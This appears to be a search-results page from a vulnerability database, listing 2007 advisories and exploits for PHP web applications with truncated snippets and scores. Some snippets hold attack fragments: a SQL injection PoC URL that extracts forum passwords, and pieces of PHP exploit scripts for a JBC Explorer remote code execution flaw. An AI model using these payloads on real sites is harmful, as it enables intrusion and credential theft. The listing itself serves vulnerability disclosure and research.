1414 matches found

0day.today
added 2008/01/05 12:0 a.m., 12 views

Tribisur <= 2.0 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================ Tribisur And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2...

7.1 AI score
Exploits 0

myhack58
added 2007/12/30 12:0 a.m., 33 views

Bypass the web environment keyword monitoring attempt-vulnerability warning-the black bar safety net

by Don not Fox http://blog.wang1.cn Problem: win2003+php environment, server installation similar to the“best information monitoring system,”The thing is, for some set of keywords for blocking. So I'm in phpshell, Execute sql queries and system command, you be prompted file does not have permissi...

6.7 AI score
Exploits 0

xssed
added 2007/12/28 12:0 a.m., 11 views

Unfixed XSS vulnerability at kkanari.org

Security researcher tweetycoaster has submitted on 28/12/2007 a cross-site scripting (XSS) vulnerability affecting kkanari.org, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 16/01/2008. It is currently...

Exploits 0, References 1

Exploit DB
added 2007/12/21 12:0 a.m., 35 views

mBlog 1.2 - 'page' Remote File Disclosure

vuln.: mBlog 1.2 Remote File Disclosure Vulnerability
script info and download: http://www.c97.net/dl/index.php?act=view&id=8
no dork for s-kiddie ;
author: irk4zatyahoo.pl
greets to: str0ke,...

7.4 AI score
Exploits 0

Prion
added 2007/11/15 12:46 a.m., 12 views

Design/Logic Flaw

classes/Url.php in Justin Hagstrom AutoIndex PHP Script before 2.2.4 allows remote attackers to cause a denial of service (CPU and memory consumption) via a %00 sequence in the dir parameter to index.php, which triggers an erroneous "recursive calculation."...

7.8 CVSS, 7.2 AI score, 0.08451 EPSS
Exploits 0, References 6, Affected Software 1

CVE
added 2007/11/15 12:0 a.m., 40 views

CVE-2007-5984

The CVE-2007-5984 issue affects Justin Hagstrom AutoIndex PHP Script prior to 2.2.4. A crafted %00 sequence in the dir parameter to index.php triggers an erroneous recursive calculation, leading to a denial of service (high CPU and memory consumption). The vulnerability is remote and does not spe...

7.8 CVSS, 6.7 AI score, 0.08451 EPSS
Exploits 0, References 6, Affected Software 1

CVE
added 2007/11/15 12:0 a.m., 44 views

CVE-2007-5983

The CVE affects the Justin Hagstrom AutoIndex PHP Script prior to 2.2.3, where the vulnerable component is index.php. The root cause is a Cross-site Scripting (XSS) vulnerability that allows remote attackers to inject arbitrary web script or HTML through the PATH_INFO (PHP_SELF). The exploitation...

4.3 CVSS, 5.8 AI score, 0.01824 EPSS
Exploits 0, References 7, Affected Software 1

exploitpack
added 2007/11/12 12:0 a.m., 11 views

AutoIndex PHP Script 2.2.2/2.2.3 - index.php Denial of Service

AutoIndex PHP Script 2.2.2/2.2.3 - index.php Denial of Service source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. Successfully exploiting this issue allows...

0.2 AI score
Exploits 0

Exploit DB
added 2007/11/12 12:0 a.m., 24 views

AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service

source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. Successfully exploiting this issue allows remote attackers to consume excessive CPU resources,...

7.4 AI score
Exploits 0

0day.today
added 2007/11/05 12:0 a.m., 28 views

JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit

Exploit for unknown platform in category web applications ======================================================= JBC Explorer agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php";...

7.1 AI score
Exploits 0

Exploit DB
added 2007/11/05 12:0 a.m., 30 views

JBC Explorer 7.20 RC 1 - Remote Code Execution

!/usr/bin/php agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php"; $xpl-post$url.'dirsys/modules/auth.php', 'suppr=1'; print "\n0x02Creating the file auth.inc.php";...

7.4 AI score
Exploits 0

Prion
added 2007/11/03 12:46 a.m., 16 views

Directory traversal

Directory traversal vulnerability in index.php in Firewolf Technologies Synergiser 1.2 RC1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter. NOTE: this can be leveraged to obtain the path by including a local PHP script with a...

7.5 CVSS, 7.6 AI score, 0.0392 EPSS
Exploits 1, References 9, Affected Software 1

Tenable Nessus
added 2007/10/11 12:0 a.m., 98 views

TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution

The remote host is running TikiWiki, an open source wiki application written in PHP. The version of TikiWiki on the remote host fails to sanitize input to the 'f' parameter of the 'tiki-graph_formula.php' script before using it as a function call. Regardless of PHP's 'register_globals' setting, an...

7.5 CVSS, 6 AI score, 0.76661 EPSS
Exploits 6, References 3

Packet Storm
added 2007/10/10 12:0 a.m., 35 views

lightblog-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n";...

7.4 AI score
Exploits 0

securityvulns
added 2007/10/01 12:0 a.m., 36 views

Promise NAS NS4300N GUI bug

List, There is a bug in the Promise NAS NS4300N web GUI firmware version 1.1.0.5 which allows an authenticated admin user to change the password of the 'root' account. The user management portion of the web interface allows the admin user to change user's passwords. The PHP script that handles th...

7.2 AI score
Exploits 0

Packet Storm
added 2007/09/28 12:0 a.m., 33 views

promise-root.txt

List, There is a bug in the Promise NAS NS4300N web GUI firmware version 1.1.0.5 which allows an authenticated admin user to change the password of the 'root' account. The user management portion of the web interface allows the admin user to change user's passwords. The PHP script that handles th...

7.4 AI score
Exploits 0

NVD
added 2007/09/26 11:17 p.m., 20 views

CVE-2007-5113

report.cgi in Google Urchin allows remote attackers to bypass authentication and obtain sensitive information (web server logs) via certain modified query parameters, as demonstrated using the profile, rid, prefs, n, vid, bd, ed, dt, and gtype parameters, a different vulnerability than CVE-2007-511...

5 CVSS, 6.3 AI score, 0.02978 EPSS
Exploits 0, References 5

Exploit DB
added 2007/09/15 12:0 a.m., 35 views

Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure

Chupix CMS 0.2.3 download.php Remote File Download Vulnerability P.Script : http://sourceforge.net/project/showfiles.php?groupid=134930 download.php Lain:18-57 - ifisset$GET'fichier' ", "", $result;...

7.4 AI score
Exploits 0

NVD
added 2007/09/11 7:17 p.m., 15 views

CVE-2007-4820

Absolute path traversal vulnerability in blanko.preview.php in Sisfo Kampus 2006 allows remote attackers to read arbitrary local files, and possibly execute local PHP scripts, via the nmf parameter...

7.5 CVSS, 7 AI score, 0.02334 EPSS
Exploits 1, References 4

Packet Storm
added 2007/08/28 12:0 a.m., 24 views

xampp-local.txt

. //27.08.2007 16:36 .. //14.08.2007 14:21 108 .asadminpass //14.08.2007 14:21 772 .asadmintruststore //14.08.2007 18:31 .exe4j4 //26.08.2007 03:13 427 .glade2 //21.08.2007 16:35 .msf3 //10.08.2007 04:41 Contacts //27.08.2007 01:44 129 default.pls //27.08.2007 17:57 Desktop //23.08.2007 21:12 $qQ...

7.4 AI score
Exploits 0